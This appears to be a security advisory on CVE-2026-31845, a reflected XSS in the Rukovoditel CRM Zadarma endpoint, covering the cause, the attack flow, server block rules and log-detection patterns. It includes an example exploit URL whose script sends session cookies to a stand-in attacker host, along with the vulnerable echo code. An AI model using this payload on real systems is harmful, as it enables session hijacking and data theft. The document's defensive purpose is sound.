CVE-2026-31845: Rukovoditel CRM Reflected XSS in Zadarma API (CVSS 9.3)

CVE-2026-31845: Rukovoditel CRM Reflected XSS in Zadarma Telephony API

A critical reflected cross-site scripting (XSS) vulnerability has been disclosed in Rukovoditel CRM, tracked as CVE-2026-31845 with a CVSS v3.1 score of 9.3 (Critical). The vulnerability exists in the Zadarma telephony API endpoint (/api/tel/zadarma.php) in all versions up to and including 3.6.4. The application directly reflects unsanitized input from the zd_echo GET parameter into the HTTP response, enabling script injection attacks.

Vulnerability Overview

Technical Analysis

Vulnerability Root Cause

The /api/tel/zadarma.php endpoint is part of Rukovoditel's integration with the Zadarma VoIP telephony service. It is designed to handle webhooks and callback data from Zadarma's API. The endpoint reads the zd_echo GET parameter and directly echoes its value into the HTTP response body without any encoding or sanitization:

// Simplified vulnerable pattern (conceptual representation)
<?php
// /api/tel/zadarma.php
$echo_value = $_GET['zd_echo'];
// No htmlspecialchars(), no strip_tags(), no input validation
echo $echo_value;
?>

Because the response is returned with a Content-Type: text/html header (or the browser infers HTML rendering), any HTML/JavaScript payload in zd_echo is executed by the victim's browser.

Exploitation

An attacker constructs a URL that targets an authenticated Rukovoditel CRM user:

https://target-crm.example.com/api/tel/zadarma.php?zd_echo=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

Attack flow:

1. Attacker crafts a malicious URL containing a JavaScript payload
   in the zd_echo parameter
 
2. Attacker delivers the URL to a CRM user via phishing email,
   internal message, or social engineering
 
3. Victim clicks the link while authenticated to the Rukovoditel CRM
 
4. The browser sends the GET request to /api/tel/zadarma.php
 
5. The server reflects the payload in the HTML response without sanitization
 
6. The victim's browser executes the injected script in the context of the CRM origin
 
7. Attacker can exfiltrate session cookies, perform actions on behalf of the user,
   or redirect to a credential-harvesting page

Why CVSS 9.3 for a Reflected XSS?

Reflected XSS typically scores lower, but the near-critical score here reflects the following factors:

• Unauthenticated endpoint — no credentials required to trigger the reflection
• Scope: Changed — successful exploitation affects resources (user sessions, CRM data) beyond the vulnerable endpoint itself
• Confidentiality/Integrity impact: High — an attacker can exfiltrate all CRM data accessible to the victim and perform any CRM action as the victim
• Attack Complexity: Low — trivial to craft and deliver a malicious URL
• No privileges required — attacker requires no account on the target system

Scope of Impact

Rukovoditel CRM is an open-source customer relationship management system widely deployed for project management, customer tracking, and task automation. Organizations using the Zadarma telephony integration are particularly exposed since the vulnerable endpoint is part of that integration.

Potential attack targets include:

• CRM administrators — full system takeover if an admin account is hijacked
• Sales and support staff — exfiltration of customer PII, deal records, contact details
• Automated webhook processors — if the CRM processes the Zadarma webhook via a service account, scheduled processing of a malicious echo value could trigger stored effects

Remediation

Primary Fix: Update Rukovoditel CRM

Update to a patched version of Rukovoditel immediately. Check the official GitHub repository for a patched release:

# Check installed version
cat /path/to/rukovoditel/config/version.php
 
# Update via Git if installed from source
cd /path/to/rukovoditel
git fetch origin
git checkout <patched-tag>

Interim Mitigations

If an immediate update is not possible:

1. Block access to the vulnerable endpoint at the web server layer:

# Nginx — block /api/tel/zadarma.php from external access
location /api/tel/zadarma.php {
    allow 127.0.0.1;
    # Add trusted Zadarma webhook IP ranges if known
    deny all;
}

# Apache — restrict access
<Location "/api/tel/zadarma.php">
    Order deny,allow
    Deny from all
    Allow from 127.0.0.1
</Location>

2. Deploy a Web Application Firewall (WAF) with XSS detection rules to intercept reflected script payloads at the perimeter.

3. Disable the Zadarma integration in the CRM settings if telephony integration is not in use.

4. Audit CRM access logs for requests to /api/tel/zadarma.php containing HTML or JavaScript characters (<, >, script, javascript:).

Detection

Identify potential exploitation attempts in web access logs:

# Search access logs for suspicious zd_echo payloads
grep "zadarma.php" /var/log/nginx/access.log | grep -iE "(<script|javascript:|onerror|onload|alert\(|document\.cookie)"
 
# Monitor for base64-encoded XSS payloads (common evasion technique)
grep "zadarma.php" /var/log/nginx/access.log | grep -iE "(base64|eval\(|atob\()"
 
# Count requests to the endpoint to identify scanning activity
awk '/zadarma\.php/ {print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head -20

Impact Assessment

Key Takeaways

1. CVE-2026-31845 is a CVSS 9.3 Critical reflected XSS in Rukovoditel CRM (≤ 3.6.4) via the /api/tel/zadarma.php endpoint
2. The zd_echo GET parameter is echoed into the HTML response without any sanitization or encoding
3. No authentication is required — the endpoint is publicly accessible
4. Patch immediately by updating to a fixed version; restrict the endpoint at the web server layer as an interim measure
5. Deploy a WAF with XSS rules and audit access logs for exploitation indicators
6. The high CVSS score reflects the combination of no-auth access, changed scope, and high impact on CRM data confidentiality and integrity

Sources

• CVE-2026-31845 — NIST NVD